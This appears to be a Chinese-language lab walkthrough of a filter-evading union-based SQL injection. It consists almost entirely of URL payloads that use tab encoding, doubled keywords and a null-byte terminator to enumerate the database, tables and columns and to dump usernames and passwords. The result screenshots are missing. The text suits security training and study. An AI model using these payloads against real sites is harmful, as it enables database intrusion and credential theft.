一、判断闭合方式
输入语句
?id=1')%09and%091=1;%00
,返回页面如下:
输入语句
?id=1')%09and%091=2;%00
,返回页面如下:
二、确定回显位
输入语句
?id=1')%09order%09by%093;%00
,返回页面如下:
这说明该网站有三个返回位。接下来我们看看这三个返回位中哪几个是回显位。输入语句
?id=0')%09unionunion%09select%09select%0912,13,14;%00
,返回页面如下:
由此我们可以知道第2和3个返回位是回显位。
三、查询数据库名、用户名、版本
输入语句
?id=0')%09unionunion%09select%09select%0912,concat(database(),'~',user(),'~',version()),14;%00
,返回页面如下:
四、查询数据表名
输入语句
?id=0')%09unionunion%09select%09select%0912,group_concat(table_name),14%09from%09information_schema.tables%09where%09table_schema=database();%00
,返回页面如下:
五、查询字段名
输入语句
?id=0')%09unionunion%09select%09select%0912,group_concat(column_name),14%09from%09information_schema.columns%09where%09table_schema=database()%09and%09table_name='users';%00
,返回页面如下:
六、查询字段内容
输入语句
?id=0')%09unionunion%09select%09select%0912,group_concat(concat(id,'~',username,'~',password)),14%09from%09users;%00
,返回页面如下: